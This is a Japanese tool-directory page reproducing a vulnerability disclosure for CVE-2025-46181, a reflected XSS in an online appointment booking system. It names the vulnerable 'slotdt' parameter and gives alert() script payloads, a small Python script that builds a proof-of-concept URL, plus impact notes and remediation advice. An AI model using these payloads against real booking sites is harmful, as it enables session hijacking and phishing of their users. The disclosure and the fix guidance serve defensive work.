Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-46181-XSS — オンライン予約システムにおけるReflected XSS脆弱性の開示、PoCスクリプト、および修復ガイダンス。脆弱なパラメータ分析と影響評価を含む。 | Kitploit
ツール/GitHubGitHub/shemkumar/cve-2025-46181-xss
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

オンライン予約システムにおけるReflected XSS脆弱性の開示、PoCスクリプト、および修復ガイダンス。脆弱なパラメータ分析と影響評価を含む。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-46181 - オンライン予約システムにおける反射型XSS

CVE-ID: CVE-2025-46181
発見者: Shemkumar P (shemkumar.github.io)
脆弱性タイプ: 反射型クロスサイトスクリプティング (XSS)
深刻度: 中
ステータス: 公開済み、MITREによりCVE割り当て


✨ 説明

公開されているオンライン予約システム(v1.0)の、特に予約確認を処理するページにおいて、反射型クロスサイトスクリプティング (XSS) の脆弱性が存在します。GETパラメータが入力を適切にサニタイズしないため、JavaScriptの注入と被害者のブラウザ上でのコード実行が可能になります。


📍 脆弱なパラメータ

GET /confirmapp.php?slotdt=<payload>

ペイロード例(エンコード済み):

<script>alert("XSS")</script>

💥 概念実証 (PoC)

<script>alert("You have been hijacked")</script>

🚫 倫理的な理由により実際のリンクは削除されています。 この脆弱性は管理された環境でテストされました。


⚙️ Python PoCスクリプト

import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ 影響

  • 任意のJavaScriptの実行
  • セッションハイジャックの可能性
  • クリックジャッキングやフィッシングへのリダイレクト
  • 細工されたリンクによる標的型攻撃

🧪 修正方法

アプリケーションは以下を行うべきです:

  • PHPのhtmlspecialchars()を使用してユーザー入力をエスケープする
  • Content Security Policy (CSP) を使用する
  • クライアント側とサーバー側の両方でユーザーデータをサニタイズする

📜 タイムライン

  • 発見: 2025年5月
  • MITREによるCVE割り当て: 2025年6月
  • 公開リリース: 2025年6月

🧑‍💻 著者

Shemkumar P
🕸️ shemkumar.github.io
🔐 サイバーセキュリティ研究者 | CTF愛好家 | CVE報告者


⚠️ この公開情報は教育および防御目的のみに使用してください。所有していない、または明示的な許可を得ていないシステムでの脆弱性のテストや悪用は違法かつ非倫理的です。

ツールをダウンロード